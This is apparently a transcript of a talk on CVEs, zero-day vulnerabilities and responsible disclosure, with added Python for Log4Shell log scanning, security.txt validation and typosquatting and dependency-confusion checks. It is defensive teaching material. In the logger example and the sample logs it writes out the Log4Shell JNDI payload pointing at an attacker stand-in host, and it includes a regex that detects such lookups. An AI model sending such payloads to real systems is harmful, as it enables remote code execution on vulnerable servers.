The Unfolding Of A Zero Day Attack
CVE 101
Theresa Mammarella
THERESA MAMMARELLA
• Software Engineer @ IBM
• Eclipse OpenJ9 JVM
• Open source developer, community
member, and speaker
@t_mammarella
linkedin.com/in/tmammarella
In 2023, the global annual cost of cyber crime is predicted to top $8 TRILLION
Source: Security Intelligence
IF CYBERCRIME WAS A COUNTRY (BY GDP)
United States: $20.89 Tr.
China: $14.72 Tr.
Cybercrime: $8.0 Tr.
Japan: $5.06 Tr.
Germany: $3.85 Tr.
United Kingdom: $2.67 Tr.
India: $2.66 Tr.
France: $2.63 Tr.
Italy: $1.89 Tr.
Canada: $1.64 Tr.
Source: globalpeoservices.com/top-15-countries-by-gdp-in-2022
INSIDER THREAT
The potential for an insider to use their authorized access or understanding of an organization to harm that organization.
• When an engineer is compromised by outside influence or dissatisfaction
• When an engineer is poorly trained
• When engineers put backdoors into a product
• When remote development systems are not secured or when protections are removed
• When accounts and credentials for terminated or inactive personnel remain available.
Source: media.defense.gov/2022/Sep/01/2003068942/-1/-1/0/ESF_SECURING_THE_SOFTWARE_SUPPLY_CHAIN_DEVELOPERS.PDF
OUTNUMBERED SECURITY STAFF LEAVES SOFTWARE VULNERABLE
[Chart: AppSec staff compared with developers]
Source: testbytes.net/blog/what-is-a-software-bug
ECONOMICS OF FIXING A SECURITY CONCERN
[Chart: cost of fix (y axis) against time (x axis)]
AGENDA
1 SECURITY BASICS
2 VULNERABILITY TRACKING
3 DISCLOSURE PROCESS
4 SECURITY PRACTICES FOR DEVELOPERS
THE BASICS
Vulnerability
Threat
Risk
Vulnerability x Threat = Risk
COMMON VULNERABILITIES AND EXPOSURES (CVE)
Description
Year
ID
References
NATIONAL VULNERABILITY DATABASE
CVSS SCORE METRICS
SCORING CONTEXT MATTERS
CVE-2023-36844 (CVSS 5.3) + CVE-2023-36845 (CVSS 5.3) + CVE-2023-36846 (CVSS 5.3) + CVE-2023-36847 (CVSS 5.3) = CVSS 9.8 (Critical)
SO WHAT IS THE BEST WAY TO TALK ABOUT VULNERABILITIES?
• Private disclosure
• Coordinated (responsible) disclosure
• Full (Public) disclosure
ZERO DAY VULNERABILITY
Security bug or flaw which is either unknown to the vendor or does not have an official patch.
The Zero Day Window is Closing
Source: Adapted from IBM X-Force / Analysis by Gartner Research (September 2016)
[Chart: average days from public disclosure to exploit (0-50) by year reported, 2006-2015, with average lines at 45 days and 15 days]
2017 2019 2021
Struts2
logger.info("{}", "${jndi:ldap://evil.badguys}");  // the parameter is attacker-controlled text; vulnerable Log4j 2 versions resolve the lookup in it
LOG4J
LOG4SHELL AND REMOTE CODE EXECUTION
[Diagram: System Loader -> JNDI Loader -> http://badserver.com]
CVE-2021-44228 (AKA LOG4SHELL)
• Coordinated disclosure
• Incomplete fix
• More CVEs follow
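The logger line on the previous slide is the whole bug: untrusted text reaches the message parameter, and the logging library interprets lookup syntax inside it. From the defender's side that gives a simple detection rule for web server logs: lookup syntax has no business appearing in request headers or query strings at all, and a JNDI lookup is the Log4Shell trigger itself. The scanner below is an added example, not code from the talk; the log lines are constructed for it.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed access-log lines for this example (not real traffic). The last quoted
# field is the User-Agent: attacker-controlled text that many applications pass
# straight to logger.info("{}", userAgent), which is exactly the Log4Shell sink.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:03:14:08 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://evil.badguys/a}"',
    '10.0.0.7 - - [10/Dec/2021:03:14:09 +0000] "GET /?q=${env:HOME} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

# Match a `${` opener through to the first `}` (or the end of the line). Any lookup in
# user-controlled data is worth a look; a JNDI lookup is an attempted Log4Shell trigger.
LOOKUP_RE = re.compile(r"\$\{[^}]*\}?")
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    line_no: int
    level: str       # "critical" for a JNDI lookup, "suspicious" for any other lookup
    snippet: str     # the matched lookup text, for the analyst


def scan_line(line_no: int, line: str) -> list[Finding]:
    """Return one Finding per lookup expression found in a single log line."""
    findings = []
    for match in LOOKUP_RE.finditer(line):
        snippet = match.group(0)
        level = "critical" if JNDI_RE.match(snippet) else "suspicious"
        findings.append(Finding(line_no, level, snippet))
    return findings


def scan_logs(lines: list[str]) -> list[Finding]:
    """Scan a whole log, numbering lines from 1 so findings can be located."""
    findings: list[Finding] = []
    for line_no, line in enumerate(lines, start=1):
        findings.extend(scan_line(line_no, line))
    return findings


def summarize(findings: list[Finding]) -> dict[str, int]:
    """Count findings per level so a dashboard can alert when 'critical' is above zero."""
    counts = {"critical": 0, "suspicious": 0}
    for finding in findings:
        counts[finding.level] += 1
    return counts


if __name__ == "__main__":
    found = scan_logs(SAMPLE_LOGS)
    for finding in found:
        print(f"line {finding.line_no}: {finding.level:<10} {finding.snippet}")
    print(summarize(found))
```

Detection is the second line of defence; the fix is upgrading Log4j (and the follow-on CVEs on this slide are the reason to track the version, not just the first patch).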
WHAT'S THE DIFFERENCE BETWEEN THESE LINES OF CODE?
CVE-2022-3786 AND CVE-2022-3602
MOST OF THESE STORIES ARE UNTOLD
Jeremy Long, founder of the OWASP Dependency Check project, speculates that "only 25% of organizations report vulnerabilities to users, and only 10% of vulnerabilities are reported as Common Vulnerabilities exposure (CVE)."
Sonatype State of the Software Supply Chain Report 2019
Security Practices for
Developers
HOW DO I DISCLOSE A VULNERABILITY IN A RESPONSIBLE WAY?
• Company website
• Security files on servers
• SECURITY.md
• Github private vulnerability reporting
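"Security files on servers" refers to security.txt (RFC 9116), served at /.well-known/security.txt so a reporter can find the right contact without guessing. Publishing one is only useful if it stays valid, so below is an added example (written for this page, not from the talk) that parses a security.txt file and checks the requirements that matter most: a Contact URI, an Expires timestamp that has not passed, and single-occurrence fields appearing once. Both sample files are constructed for the example.

```python
from __future__ import annotations

from datetime import datetime, timezone

# Constructed security.txt for a hypothetical host (example.com is a reserved name).
GOOD_SECURITY_TXT = """\
# Vulnerability disclosure information for example.com
Contact: mailto:security@example.com
Contact: https://example.com/security/report
Expires: 2030-01-01T00:00:00Z
Encryption: https://example.com/pgp-key.txt
Preferred-Languages: en, de
Canonical: https://example.com/.well-known/security.txt
Policy: https://example.com/security/policy
"""

# The same file with common mistakes (also constructed): a bare e-mail address
# instead of a URI, no Expires, and a once-only field repeated.
BAD_SECURITY_TXT = """\
Contact: security@example.com
Preferred-Languages: en
Preferred-Languages: de
"""

# Field names registered for security.txt (RFC 9116, plus the later CSAF registration).
KNOWN_FIELDS = {"Acknowledgments", "Canonical", "Contact", "CSAF", "Encryption",
                "Expires", "Hiring", "Policy", "Preferred-Languages"}
ONCE_ONLY = {"Expires", "Preferred-Languages"}
CONTACT_SCHEMES = ("mailto:", "https://", "tel:")


def parse_security_txt(text: str) -> dict[str, list[str]]:
    """Parse 'Field: value' lines into {field: [values...]}, skipping comments and blanks."""
    fields: dict[str, list[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            raise ValueError(f"malformed line: {raw!r}")
        name, value = line.split(":", 1)
        fields.setdefault(name.strip(), []).append(value.strip())
    return fields


def validate_security_txt(fields: dict[str, list[str]], now: datetime | None = None) -> list[str]:
    """Return a list of problems; an empty list means the file passes these checks."""
    now = now or datetime.now(timezone.utc)
    problems: list[str] = []
    if "Contact" not in fields:
        problems.append("Contact is required")
    for contact in fields.get("Contact", []):
        if not contact.startswith(CONTACT_SCHEMES):
            problems.append(f"Contact must be a URI (mailto:, https:// or tel:), got {contact!r}")
    if "Expires" not in fields:
        problems.append("Expires is required")
    else:
        try:
            # fromisoformat() on older Pythons does not accept a trailing 'Z'.
            expires = datetime.fromisoformat(fields["Expires"][0].replace("Z", "+00:00"))
            if expires <= now:
                problems.append(f"file expired on {expires.isoformat()}")
        except ValueError:
            problems.append("Expires is not an ISO 8601 timestamp")
    for name in sorted(ONCE_ONLY):
        if len(fields.get(name, [])) > 1:
            problems.append(f"{name} must appear at most once")
    for name in fields:
        if name not in KNOWN_FIELDS:
            problems.append(f"unknown field: {name}")
    return problems


if __name__ == "__main__":
    for label, text in (("good", GOOD_SECURITY_TXT), ("bad", BAD_SECURITY_TXT)):
        print(label, validate_security_txt(parse_security_txt(text)) or "OK")
```

Running the check as a scheduled job, with the Expires date compared against the current time, catches the most common failure: a file that was correct when published and quietly expired a year later.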
SOFTWARE DEPENDENCIES
Dependencies
Dev Tools
Applications
TYPES OF SUPPLY CHAIN ATTACKS
• Typosquatting
• Open source repo attacks
• Build tool attacks
• Dependency confusion
curl vs cyrl
internalpkgname @ v1 vs internalpkgname @ v99999
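The two pairs above are the signatures of typosquatting (a package name one keystroke away from the real one) and dependency confusion (a public package with the same name as an internal one but a higher version, so a resolver that consults both registries picks the public copy). Both can be checked before install. The audit below is an added example written for this page, not code from the talk or from any package manager; the package names, registries and versions are constructed, and the distance threshold of 1 is a choice for the example.

```python
from __future__ import annotations

# All data below is constructed for this example.
# Packages the organisation knowingly depends on (its allow list).
KNOWN_PACKAGES = {"curl", "requests", "numpy", "lodash", "express"}
# Names that should only ever come from the private registry.
INTERNAL_INDEX = {"internalpkgname": ["1.0.0", "1.2.0"]}
# What the public registry reports for the same names. Someone has published
# "internalpkgname" there with an inflated version, so a resolver that merges both
# registries and prefers the highest version would fetch the public copy.
PUBLIC_INDEX = {"internalpkgname": ["99999.0.0"], "curl": ["8.4.0"], "cyrl": ["0.0.1"]}


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment (Damerau-Levenshtein) distance: an insertion, deletion,
    substitution or swap of adjacent characters each costs 1."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidates(name: str, known: set[str], max_distance: int = 1) -> list[str]:
    """Known packages that `name` is a near miss of; empty if `name` itself is known."""
    if name in known:
        return []
    return sorted(k for k in known if osa_distance(name.lower(), k.lower()) <= max_distance)


def parse_version(version: str) -> tuple[int, ...]:
    """Numeric dotted versions only; enough for the comparison this check needs."""
    return tuple(int(part) for part in version.split("."))


def dependency_confusion_risk(name: str, internal: dict[str, list[str]],
                              public: dict[str, list[str]]) -> str | None:
    """Explain why resolving an internal name could fetch a public package, or None."""
    if name not in internal or name not in public:
        return None
    best_internal = max(internal[name], key=parse_version)
    best_public = max(public[name], key=parse_version)
    if parse_version(best_public) > parse_version(best_internal):
        return (f"public {name}=={best_public} outranks internal {name}=={best_internal}; "
                "configure the private registry as the only source for this name")
    return f"public {name} exists; configure the private registry as the only source for this name"


def audit_manifest(requested: list[str]) -> dict[str, str]:
    """Run both checks over a dependency list and return {package: reason} for findings."""
    findings: dict[str, str] = {}
    for name in requested:
        squat = typosquat_candidates(name, KNOWN_PACKAGES)
        if squat:
            findings[name] = f"possible typosquat of {', '.join(squat)}"
            continue
        confusion = dependency_confusion_risk(name, INTERNAL_INDEX, PUBLIC_INDEX)
        if confusion:
            findings[name] = confusion
    return findings


if __name__ == "__main__":
    for package, reason in audit_manifest(["cyrl", "internalpkgname", "requests"]).items():
        print(f"{package}: {reason}")
```

The durable fix for the second case is in the resolver configuration rather than in a scanner: scope or namespace internal names so the public registry is never consulted for them, and pin versions with a lockfile.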
HOW FAST IS YOUR RELEASE PROCESS?
Sonatype: State of the Software Supply Chain 2022
SECURITY CHAMPION
RECAP
• Vulnerability x Threat = Risk
• CVEs, CVSS, disclosure process
• The Mantra/OWASP Top 10
• Dependency management
• Release speed
• Security champion programs
THANK YOU
Longhorn PHP!
• Linux Foundation free course: Developing Secure Software
https://training.linuxfoundation.org/training/developing-secure-software-lfd121/
• OWASP’s list of Free for Open Source Application Security Tools
https://owasp.org/www-community/Free_for_Open_Source_Application_Security_Tools
KEEP IN TOUCH:
@t_mammarella
linkedin.com/in/tmammarella